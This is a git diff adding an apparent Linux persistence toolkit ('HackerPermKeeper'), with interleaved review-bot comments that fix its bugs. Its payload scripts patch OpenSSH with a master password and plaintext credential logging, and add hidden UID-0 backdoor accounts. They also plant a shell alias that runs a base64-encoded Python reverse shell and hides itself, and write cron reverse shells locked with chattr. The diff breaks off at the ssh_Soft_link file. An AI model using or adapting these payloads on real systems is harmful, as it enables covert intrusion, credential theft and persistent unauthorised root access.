diff --git a/check/check.py b/check/check.py
new file mode 100644
index 0000000..df9f9e4
--- /dev/null
+++ b/check/check.py
@@ -0,0 +1,115 @@
+# coding=utf-8
+# !/usr/bin/env python
+# coding=utf-8
+from __future__ import print_function
+import subprocess
+import os
+import platform
+
+
+def ml(command):
+ process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+ process.wait() # 等待子进程完成
+
+ stdout, stderr = process.communicate() # 获取子进程的输出和错误
+ try:
+ decoded_stdout = stdout.decode('utf-8')
+ except UnicodeDecodeError:
+ decoded_stdout = stdout.decode('latin1')
+ try:
+ decoded_stderr = stderr.decode('utf-8')
+ except UnicodeDecodeError:
+ decoded_stderr = stderr.decode('latin1')
+ return decoded_stdout
+
+
+def check_alerts():
+ try:
+ output = subprocess.check_output(['alias'], stderr=subprocess.STDOUT, shell=True)
+ print("Yes----alerts后门")
+ except subprocess.CalledProcessError:
+ print("No----alerts后门")
+
+
+def check_sshkey():
+ file_path = "/root/.ssh/authorized_keys"
+ if os.path.exists(file_path):
+ print("Yes----ssh公私密钥后门")
+ else:
+ print("Yes----ssh公私密钥后门")
+
+
+def check_adduser():
+ root_gid = 0 # GID for "root"
+ # Get current user's GID
+ current_gid = os.getgid()
+ # Check if current user is a member of the root group
+ if current_gid == root_gid:
+ print("yes----ssh后门用户")
+ else:
+ print("No----ssh后门用户")
+
+
+def check_crontab():
+ cron_files = ["/etc/crontab"]
+ for cron_file in cron_files:
+ if os.access(cron_file, os.W_OK):
+ print("yes----计划任务后门")
+ else:
+ print("No----计划任务后门")
+
+
+def check_strace():
+ j = ml('strace -V')
+ if 'strace -- version' in j:
+ print("yes----strace后门")
+ else:
+ print("No----strace后门")
+
+
+def check_ssh_Soft_link():
+ command = 'cat /etc/ssh/sshd_config|grep UsePAM'
+ j = ml(command)
+ if 'UsePAM yes' in j:
+ print("yes----SSH软链接后门")
+ else:
+ print("No----SSH软链接后门")
+
+
+def check_Rootkit():
+ system_info = platform.uname()
+ kernel_version = platform.release()
+ # 定义支持的最低和最高内核版本
+ min_kernel_version = {
+ 'Centos 6.10': '2.6.32-754.6.3.el6.x86_64',
+ 'Centos 7': '3.10.0-862.3.2.el7.x86_64', + 
'Centos 8': '4.18.0-147.5.1.el8_1.x86_64', + 'Ubuntu 18.04.1 LTS': '4.15.0-38-generic' + } + max_kernel_version = { + 'Centos 6.10': '2.6.32', + 'Centos 7': '3.10.0', + 'Centos 8': '4.18.0', + 'Ubuntu 18.04.1 LTS': '4.15.0' + } + current_os = system_info[0] + ' ' + system_info[2] + ': ' + kernel_version + if current_os in min_kernel_version: + min_version = min_kernel_version[current_os] + max_version = max_kernel_version[current_os] + + if min_version <= kernel_version <= max_version: + print("yes----Rootkit后门:https://github.com/f0rb1dd3n/Reptile/") + else: + print("No----Rootkit后门") + + +if __name__ == '__main__': + print('HackerPermKeeper') + print('OpenSSH后门太过久远,而且很可能会导致ssh连接报错,所以不建议使用[只测试过乌班图14版本成功]') + check_adduser() + check_alerts() + check_crontab() + check_ssh_Soft_link() + check_sshkey() + check_strace() + check_Rootkit() diff --git a/choose.py b/choose.py new file mode 100644 index 0000000..3122636 --- /dev/null +++ b/choose.py 
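Review bot: check_sshkey prints "Yes----ssh公私密钥后门" on both sides of its os.path.exists test, so that detector can never report a clean host; the else branch should be `print("No----ssh公私密钥后门")`, and because /root/.ssh/authorized_keys exists on most administered machines, printing the keys it holds for comparison against a known baseline would be the more useful positive. check_Rootkit builds its lookup key as `system_info[0] + ' ' + system_info[2] + ': ' + kernel_version`, which on Linux is "Linux <release>: <release>" and never equals the "Centos 7" / "Ubuntu 18.04.1 LTS" keys, and even a matching key could not fire because every min string carries a "-862.3.2.el7"-style suffix that sorts after the bare max string, so the distribution should be read from /etc/os-release and versions compared as parsed tuples — or the check dropped, since a kernel being inside Reptile's supported range is not evidence that Reptile is installed. check_alerts runs `subprocess.check_output(['alias'], shell=True)`, which starts a non-interactive /bin/sh where alias prints nothing and exits 0, so it unconditionally prints the "Yes" line; reading ~/.bashrc and any file it sources is what would actually find an alias backdoor. check_adduser and check_crontab test the scanner's own GID and its write access to /etc/crontab, properties of the running process rather than of the host; the rewrite below scans /etc/passwd for extra UID-0 accounts, which is what the adduser payload in this PR creates (`useradd -o -u 0`), and check_crontab should likewise inspect /etc/crontab's contents and its immutable attribute (lsattr) instead of os.access.
```python
def check_adduser():
    # A backdoor account is any non-root entry with UID 0 (useradd -o -u 0);
    # that is a property of /etc/passwd, not of the user running the scan.
    extra_root = []
    with open('/etc/passwd') as passwd:
        for line in passwd:
            fields = line.rstrip('\n').split(':')
            if len(fields) > 2 and fields[2] == '0' and fields[0] != 'root':
                extra_root.append(fields[0])
    if extra_root:
        print("yes----ssh后门用户: " + ', '.join(extra_root))
    else:
        print("No----ssh后门用户")
```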
@@ -0,0 +1,111 @@ +# coding=utf-8 +# !/usr/bin/env python +import sys + +from colorama import init +from termcolor import colored +import os + + +init() + + +def Dowfile(input_files,file_name): + if not os.path.exists('payloads'): + os.makedirs('payloads') + with open(input_files, 'r', encoding='utf-8') as input_file, open('payloads/'+file_name, 'w+',encoding='utf-8') as output_file: + # 读取输入文件的内容 + content = input_file.read() + + # 将内容写入输出文件 + output_file.write(content) + print(f'生成成功,文件为:/payloads/{file_name}') + + +def chooses(): + s = [] + i = 0 + print(colored('HackerPermKeeper v1.0 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) + print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) + print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) + print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) + print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) + print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) + print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) + print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) + print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) + print(colored('HackerPermKeeper[请输入多个模块序号, 一行一个,输入exit输出完成]', 'green')) + while True: + a = input(colored(f'[{i}]:', 'green')) + if a in ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'exit']: + i = i + 1 + if a != 'exit': + if a == str(1): + print('请修改生成完的文件,里面的记录明文的文件位置') + Dowfile('payload/1OpenSSH/sshOpenSSH.py','sshOpenSSH.py') + break + elif a == str(2): + print('请修改生成完的文件,里面的用户名和密码') + i = input('创不创home目录下用户文件夹[不创建的话,使用会出现一些bug,建议创建]:[1]不创建 [2]创建:') + if i == '1': + Dowfile('payload/adduser/adduser.py','adduser.py') + elif i == '2': + Dowfile('payload/adduser/adduser_new_user.py','adduser_new_user.py') + else: + print('输入错误') + break + elif a == str(3): + print('请修改生成完的文件,里面的反弹shell的ip以及port') + i 
= input('输入python版本[3 or 2]:') + if i == '3': + Dowfile('payload/alerts/alerts.py','alerts.py') + elif i == '2': + Dowfile('payload/alerts/alerts2.py','alerts2.py') + else: + print('输入错误') + break + elif a == str(4): + print('请修改生成完的文件,里面的反弹shell的ip以及port') + i = input('计划任务后门分为:[1]直接写入/etc/crontab文件中 or [2]直接使用crontab命令生成:') + if i == '1': + Dowfile('payload/crontab/etc_Cron.py', 'etc_Cron.py') + elif i == '2': + Dowfile('payload/crontab/Cron_n.py', 'Cron_n.py') + else: + print('输入错误') + break + elif a == str(5): + print('请修改生成完的文件,里面的连接端口 [连接ssh user@ip -p port]') + Dowfile('payload/ssh_Soft_link/ssh_Soft_link.py', 'ssh_Soft_link.py') + break + elif a == str(6): + i = input('ssh公私密钥后门分为:[1]在自己服务器生成 or [2]在目标机器生成:') + if i == '1': + print( + '生成之后,运行ssh-keygen -t ed25519 -N "admin!@#45123", -N为密码,注意需要把id_ed25519.pub,填入生成的文件id_ed25519_pub变量中,连接ssh -i id_ed25519 user@ip 如果连接报错,请输入chmod 600 id_ed25519') + Dowfile('payload/sshkey/sshkey_local.py', 'sshkey_local.py') + break + elif i == '2': + print('生成之后,修改文件中的password密码,在目标机器运行之后,下载/tmp/.11 密钥文件,连接ssh -i .11 root@ip 如果连接报错,请输入chmod 600 .11' + '在对方服务器运行之后,下载/tmp/.11文件,这个文件就是密钥文件,下载之后可以删除,然后在连接') + Dowfile('payload/sshkey/sshkey_target.py', 'sshkey_target.py') + break + else: + print('输入错误') + break + elif a == str(7): + print('请修改生成完的文件,里面的记录明文的文件位置') + Dowfile('payload/strace/sshd.py','sshd.py') + break + elif a == str(8): + print('项目地址:https://github.com/f0rb1dd3n/Reptile/') + break + else: + print('Null') + break + else: + pass + break + else: + print("输入无效,请重新输入!") + a = input(colored(f'[{i}]:', 'green')) diff --git a/config.py b/config.py new file mode 100644 index 0000000..c14fe5c --- /dev/null +++ b/config.py 
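Review bot: The banner in chooses() promises several module numbers entered one per line, but every accepted branch ends in `break` (the `exit` path is `else: pass` followed by `break` as well), so the loop leaves after the first valid entry and the numbered prompt never advances; drop the per-branch `break` and let `exit` be the only way out if multi-select is intended, or change the banner. The invalid-input branch ends with `a = input(colored(f'[{i}]:', 'green'))`, whose value is discarded when the loop head prompts again, so one typo costs the operator two prompts — remove that trailing input() call. Sub-prompts such as `i = input('输入python版本[3 or 2]:')` overwrite the loop counter `i` with a string, which only survives because the branch breaks immediately; give them their own name. Dowfile opens `payload/...` relative to the current working directory and then reports the copy as `/payloads/{file_name}`, so run from another directory it raises FileNotFoundError and the message names a path that was never written; resolve both against `os.path.dirname(os.path.abspath(__file__))`.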
@@ -0,0 +1,47 @@ +# coding=utf-8 +# !/usr/bin/env python + + +from colorama import init +from termcolor import colored + +init() + + +def configs(): + print(colored('HackerPermKeeper v1.0 by 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) + print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) + print('OpenSSH后门 优点:直接重置目标服务器的OpenSSH,在里面写入万能密码以及记录ssh明文账户代码 '' 缺点:需要依大量的依赖环境,而且只能使用低版本系统,目前经过测试的有乌班图14',colored('[建议指数:*]\n', 'red')) + + print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) + print('后门用户 优点:直接写入后门用户,而且不生成home目录下文件,快捷方便,所有系统支持 缺点:容易发现',colored('[**]\n', 'red')) + + print(colored('3--------------Alias别名后门', 'yellow'),colored('[利用]', 'red')) + print('Alias别名后门 优点:使用别名来执行命令或者反弹shell,如执行ls,设置之后,就会反弹shell 缺点:需要当前用户执行命令为常用命令',colored('[***]\n', 'red')) + + print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) + print('crontab计划任务 优点:设置计划任务来执行反弹shell,其中参考了挖矿病毒计划任务,其中有直接执行crontab来写入,还有直接写入/etc/crontab文件中 缺点:出网执行反弹shell,在流量会被发现',colored('[****]\n', 'red')) + + print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) + print('ssh软连接后门 优点:快速设置ssh连接,不需要密码 缺点:在流量会被发现',colored('[****]\n', 'red')) + + print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) + print('ssh公私密钥后门 优点:快速设置密钥连接,其中参考了挖矿病毒ssh公私密钥,管理员很难发现 缺点:在流量会被发现', colored('[*****]\n', 'red')) + + print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) + print('Strace后门 优点:键盘记录的后门,记录ssh明文以及密钥 缺点:需要配合权限维持使用',colored('[****]\n', 'red')) + + print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) + print('Rootkit后[使用的是github项目] 优点:很难发现,几乎不可能发现,而且Rootkit后门包括了反弹shell[使用netstat -tulnp,不会显示],文件隐藏等 缺点:对于系统版本要求很严格',colored('[******]', 'red')) + print('项目地址:https://github.com/f0rb1dd3n/Reptile/') + +def configss(): + print(colored('HackerPermKeeper v1.0 by 弱鸡 支持以下漏洞检测 https://github.com/ytMuCheng/HackerPermKeeper/', 'green')) + 
print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red')) + print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red')) + print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red')) + print(colored('4--------------crontab计划任务', 'yellow'),colored('[利用]', 'red')) + print(colored('5--------------ssh软连接后门', 'yellow'),colored('[利用]', 'red')) + print(colored('6--------------ssh公私密钥后门', 'yellow'),colored('[利用]', 'red')) + print(colored('7--------------Strace后门', 'yellow'),colored('[利用]', 'red')) + print(colored('8--------------Rootkit后门', 'yellow'),colored('[检测]', 'blue')) diff --git a/main.py b/main.py new file mode 100644 index 0000000..1c32d31 --- /dev/null +++ b/main.py @@ -0,0 +1,45 @@ +# coding=utf-8 +# !/usr/bin/env python + + +from colorama import init +from termcolor import colored +from argparse import ArgumentParser +import os +import sys + +from config import configs +from config import configss +from choose import chooses + +init() + + +try: + name = colored('HackerPermKeeper v1.0 by 弱鸡 https://github.com/ytMuCheng/HackerPermKeeper/', 'green') + arg = ArgumentParser(description=name ) # 创建解析器, description内容就是 + arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1") + arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ") + args = arg.parse_args() # 解析参数 + multiple = args.multiple # 接受参数 + config = args.config # 接受参数 + if multiple != None or config != None: + if multiple != None: + chooses() + if config != None: + if config == '1': + configss() + elif config == '2': + configs() + else: + print('输入错误') + configss() + + else: + os.system('python main.py -h') + sys.exit() + +except KeyboardInterrupt as error: # ctr +c + print(colored(f'\n------------------------------------------', 'red'), '{', colored("程序终止", "green"), '}', + colored(f'------------------------------------------', 'red')) + sys.exit() 
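Review bot: The no-argument path in main.py runs `os.system('python main.py -h')`, which depends on the working directory and on a `python` binary being first on PATH (on many hosts that is Python 2 or absent); `arg.print_help()` prints the same text without spawning a shell. The `-m` value is parsed into `multiple` but never forwarded — `chooses()` takes no arguments — so `-m 1` and `-m 99` behave identically and the "-m 1" in the help text is misleading; either pass the value through or declare `-m` with `action='store_true'`. `multiple != None` and `config != None` should be `is not None`, and the `error` bound by `except KeyboardInterrupt as error` is unused.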
diff --git a/payload/1OpenSSH/sshOpenSSH.py b/payload/1OpenSSH/sshOpenSSH.py
new file mode 100644
index 0000000..2913b4f
--- /dev/null
+++ b/payload/1OpenSSH/sshOpenSSH.py
@@ -0,0 +1,122 @@ +# coding=utf-8 +# !/usr/bin/env python +import subprocess +import os + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def Dowrj(): + command = "ls -la" + j = ml(command) + if "0x06-openssh-5.9p1.patch.tar.gz" in j and "openssh-5.9p1.tar.gz" in j: + print("----------------------->软件包已经存在<-----------------------") + return 1 + else: + print("----------------------->正在下载软件包<-----------------------") + return 0 + + +def dfiel(): + command = "tar -xzvf openssh-5.9p1.tar.gz && tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz && cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1 &&cd openssh-5.9p1 && patch < sshbd5.9p1.diff" + ml(command) + + +def miyue(old_contentm, new_content): + filename = "openssh-5.9p1/includes.h" + with open(filename, 'r') as file: + lines = file.readlines() + for a in range(0, 3): + with open(filename, 'w') as file: + for line in lines: + if line.strip() != old_contentm.strip(): + file.write(line) + file.write(new_content + '\n') + + +def check_package_DowUbuntu(): + packages = ['openssl', 'libssl-dev', 'libpam0g-dev', 'libkrb5-dev', 'make', 'gcc', 'g++'] + print('------------------------->正在安装依赖<-------------------------') + for package in packages: + devnull = open(os.devnull, 'w') + result = subprocess.Popen(['dpkg', '-s', package], stdout=subprocess.PIPE, stderr=devnull) + result.wait() + if result.returncode == 0: + print("----------------------->{} 已安装<-----------------------".format(package)) + else: + print("----------------------->{} 未安装<-----------------------".format(package)) + command = "apt-get install 
-y {}".format(package) + ml(command) + devnull = open(os.devnull, 'w') + result = subprocess.Popen(['dpkg', '-s', package], stdout=subprocess.PIPE, stderr=devnull) + result.wait() + if result.returncode == 0: + print("----------------------->{} 已安装<-----------------------".format(package)) + else: + print("----------------------->{} 安装失败<-----------------------".format(package)) + + return True + + +def DowUbuntu(password): + check_package = check_package_DowUbuntu() + if not check_package: + print("正在安装软件包") + + command = "./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install" + current_path = os.getcwd() + working_directory = os.path.join(current_path, "openssh-5.9p1") + process = subprocess.Popen(command, shell=True, cwd=working_directory) + process.wait() + + ml("service ssh restart") + ml("rm -rf 0x06-openssh-5.9p1.patch.tar.gz") + ml("rm -rf openssh-5.9p1.tar.gz") + ml("rm -rf penssh-5.9p1") + ml("rm -rf openssh-5.9p1.patch") + print("------------------------>软件包已经清除<-------------------------") + restart_result = ml("service ssh status") + if restart_result is not None and "ssh start/spawned" in restart_result: + print("密码为"+password) + + + +if __name__ == '__main__': + if Dowrj() == 0: + command = "wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz && wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz" + subprocess.Popen(command, shell=True).wait() + # .wait() 是 subprocess.Popen() 对象的方法之一,用于等待子进程完成执行并返回退出状态。 + + dfiel() + + llinst = ['#define SECRETPW "apaajaboleh"', ' #define ILOG "/tmp/ilog"', '#define OLOG "/tmp/olog"', + '#endif /* INCLUDES_H */'] + password = 'admin123!@qwe' + password2 = '/tmp/ilog' + password3 = '/tmp/olog' + llinst_new_content = ['0', '0', '0', '#endif /* INCLUDES_H */'] + llinst_new_content[0] = '#define SECRETPW "' + password + '"' + llinst_new_content[1] = '#define ILOG "' + password2 + '"' + llinst_new_content[2] = 
'#define OLOG "' + password3 + '"' + """ +#define ILOG "/tmp/ilog" #ILOG是别人用ssh登录该主机记录的日志目录[以及登录密码,当是不会记录隐藏账户] +#define OLOG "/tmp/olog" #OLOG是该主机用ssh登录其他主机记录的日志目录 +#define SECRETPW "xiaodi" #万能密码 + """ + for a in range(0, 4): + miyue(llinst[a], llinst_new_content[a]) + DowUbuntu(password) diff --git a/payload/adduser/adduser.py b/payload/adduser/adduser.py new file mode 100644 index 0000000..407a25e --- /dev/null +++ b/payload/adduser/adduser.py @@ -0,0 +1,47 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def adduser(user, password): + command = "useradd -p $(openssl passwd -1 -salt 'salt' " + password + ") " + user + " -o -u 0 -g root -G root -s /bin/bash -M" + ml(command) + command = "cat /etc/passwd" + j = ml(command) + command = "cat /etc/shadow" + j2 = ml(command) + if user in j and user in j2: + print("----------------------->user:" + user + "password: " + password + "< -----------------------") + else: + print("----------------------->失败<-----------------------") + + +def deluser(user): + command = "sed -i '/^" + user + ":/d' /etc/shadow" + ml(command) + command = "sed -i '/^" + user + ":/d' /etc/passwd" + ml(command) + + +if __name__ == '__main__': + user = 'passw123' + password = 'admin@#45123' + adduser(user, password) + # deluser(user) #删除用户 diff --git a/payload/adduser/adduser_new_user.py b/payload/adduser/adduser_new_user.py new file mode 100644 index 0000000..1ed637d --- /dev/null +++ b/payload/adduser/adduser_new_user.py 
@@ -0,0 +1,46 @@ +# coding=utf-8 +from __future__ import print_function +import subprocess + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def adduser(user, password): + command = "useradd -p $(openssl passwd -1 -salt 'salt' " + password + ") " + user + " -o -u 0 -g root -G root -s /bin/bash -d /root" + ml(command) + command = "cat /etc/passwd" + j = ml(command) + command = "cat /etc/shadow" + j2 = ml(command) + if user in j and user in j2: + print("----------------------->user:" + user + " password: " + password + "< -----------------------") + else: + print("----------------------->失败<-----------------------") + + +def deluser(user): + command = "sed -i '/^" + user + ":/d' /etc/shadow" + ml(command) + command = "sed -i '/^" + user + ":/d' /etc/passwd" + ml(command) + + +if __name__ == '__main__': + user = 'passw123' + password = 'admin@#45123' + adduser(user, password) + # deluser(user) #删除用户 diff --git a/payload/alerts/alerts.py b/payload/alerts/alerts.py new file mode 100644 index 0000000..6df47e5 --- /dev/null +++ b/payload/alerts/alerts.py 
@@ -0,0 +1,86 @@ +# coding=utf-8 +# !/usr/bin/env python +import subprocess +import os +import base64 + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def newfile(new_content): + filename = "/etc/update-manager/release-update" + with open(filename, 'a+') as file: + file.write(new_content + '\n') + + +def newfile2(): + filename = os.path.expanduser("~/.bashrc") + new_content = """ +#enable software update with apt +#See /etc/apt/source.d/ in the apt package. +if [ -f /etc/update-manager/release-update ]; then + . /etc/update-manager/release-update +fi + """ + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def base64_encode(): + data = ''' +import os +import socket +import subprocess +import sys + +ret = os.fork() + +if ret > 0: + sys.exit() +else: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(("192.168.86.131", 3322)) + os.dup2(s.fileno(), 0) + os.dup2(s.fileno(), 1) + os.dup2(s.fileno(), 2) + p = subprocess.call(["/bin/bash", "-i"]) + except Exception as e: + sys.exit() + ''' + encoded_bytes = base64.b64encode(data.encode('utf-8')) + encoded_string = encoded_bytes.decode('utf-8') + return encoded_string + +def checkkey(): + file_path = "/etc/update-manager/release-update" + if os.path.exists(file_path): + print("Yes----成功") + else: + print("No----失败") + +if __name__ == '__main__': + payload = base64_encode() + newfile( + """alias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode('\\''""" + payload + """'\\''))";};alerts'""") + newfile( + """alias 
unalias='alerts(){ if [ $# != 0 ]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'""") + newfile( + """alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\\''/";};alerts'""") + newfile2() + ml('sudo touch -acmr /etc/update-manager/release-upgrades /etc/update-manager/release-update') + checkkey() \ No newline at end of file diff --git a/payload/alerts/alerts2.py b/payload/alerts/alerts2.py new file mode 100644 index 0000000..315ce2d --- /dev/null +++ b/payload/alerts/alerts2.py 
@@ -0,0 +1,86 @@ +# coding=utf-8 +# !/usr/bin/env python +import subprocess +import os +import base64 + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def newfile(new_content): + filename = "/etc/update-manager/release-update" + with open(filename, 'a+') as file: + file.write(new_content + '\n') + + +def newfile2(): + filename = os.path.expanduser("~/.bashrc") + new_content = """ +#enable software update with apt +#See /etc/apt/source.d/ in the apt package. +if [ -f /etc/update-manager/release-update ]; then + . /etc/update-manager/release-update +fi + """ + with open(filename, 'a') as file: + file.write(new_content + '\n') + + +def base64en(): + code = ''' +import os +import socket +import subprocess +import sys + +ret = os.fork() + +if ret > 0: + sys.exit() +else: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(("192.168.86.131", 3333)) + os.dup2(s.fileno(), 0) + os.dup2(s.fileno(), 1) + os.dup2(s.fileno(), 2) + p = subprocess.call(["/bin/bash", "-i"]) + except Exception as e: + sys.exit() + ''' + encoded_code = base64.b64encode(code) + return encoded_code + +def checkkey(): + file_path = "/etc/update-manager/release-update" + if os.path.exists(file_path): + print("Yes----成功") + else: + print("No----失败") + +if __name__ == '__main__': + # alias ls='alerts(){ ls $* --color=auto;执行的命令;};alerts' + payload = base64en() + newfile( + """alias ls='alerts(){ ls $* --color=auto;python2 -c "import base64,sys;exec(base64.b64decode('\\''""" + payload + """'\\''))";};alerts'""") + newfile( + """alias unalias='alerts(){ if [ $# != 0 
]; then if [ $* != "ls" ]&&[ $* != "alias" ]&&[ $* != "unalias" ]; then unalias $*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};alerts'""") + newfile( + """alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\\''/";};alerts'""") + newfile2() + ml('sudo touch -acmr /etc/update-manager/release-upgrades /etc/update-manager/release-update') + checkkey() diff --git a/payload/crontab/Cron_n.py b/payload/crontab/Cron_n.py new file mode 100644 index 0000000..f867531 --- /dev/null +++ b/payload/crontab/Cron_n.py 
@@ -0,0 +1,51 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess +import os + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def etc_crontab(shell, file_path): + with open(file_path, 'w') as file: + file.write(shell) + + command = '(crontab -l;printf "*/1 * * * * ' + ' /bin/bash ' + file_path + ';/bin/bash --noprofile -i;\\rno crontab for `whoami` %100c\\n")|crontab -' + ml(command) + + +def xt(file_path): + command = 'chattr +i /var/spool/cron/' + ml(command) + command = 'chattr +i ' + file_path + ml(command) + +def check_sshkey(file_path): + if os.path.exists(file_path): + print("Yes----crontab计划任务后门") + else: + print("No----crontab计划任务后门") + +if __name__ == '__main__': + # https://taoyuan.cool/shell/在这个网站获取反弹shell语句写在下面,注意,下面语句如果有双引号,请加上\\"进行转义,下面语句也可以在计划任务中,执行某个命令 + shell = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.131",3322));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'""" + file_path = "/tmp/.xx.sh" + etc_crontab(shell, file_path) + command = 'chmod + x ' + file_path + ml(command) + xt(file_path) + check_sshkey(file_path) diff --git a/payload/crontab/etc_Cron.py b/payload/crontab/etc_Cron.py new file mode 100644 index 0000000..8cb05cf --- /dev/null +++ b/payload/crontab/etc_Cron.py 
@@ -0,0 +1,40 @@ +# coding=utf-8 +# !/usr/bin/env python +from __future__ import print_function +import subprocess + + +def ml(command): + process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + process.wait() # 等待子进程完成 + + stdout, stderr = process.communicate() # 获取子进程的输出和错误 + try: + decoded_stdout = stdout.decode('utf-8') + except UnicodeDecodeError: + decoded_stdout = stdout.decode('latin1') + try: + decoded_stderr = stderr.decode('utf-8') + except UnicodeDecodeError: + decoded_stderr = stderr.decode('latin1') + return decoded_stdout + + +def etc_crontab(shell): + command = 'whoami' + user = ml(command).strip() + command = 'echo "*/1 * * * * ' + user + ' ' + shell + '" | sudo tee -a /etc/crontab' + ml(command) + command = 'cat /etc/crontab' + j = ml(command) + if '*/1 * * * *' in j: + print("Yes----crontab计划任务后门") + else: + print("No----crontab计划任务后门") + + +if __name__ == '__main__': + # https://taoyuan.cool/shell/在这个网站获取反弹shell语句写在下面,注意,下面语句如果有双引号,请加上\\"进行转义,下面语句也可以在计划任务中,执行某个命令 + shell = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\"192.168.86.131\\",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\\"bash\\")'""" + etc_crontab(shell) + ml('chattr +i /etc/crontab') diff --git a/payload/ssh_Soft_link/ssh_Soft_link.py b/payload/ssh_Soft_link/ssh_Soft_link.py new file mode 100644 index 0000000..b7849ed --- 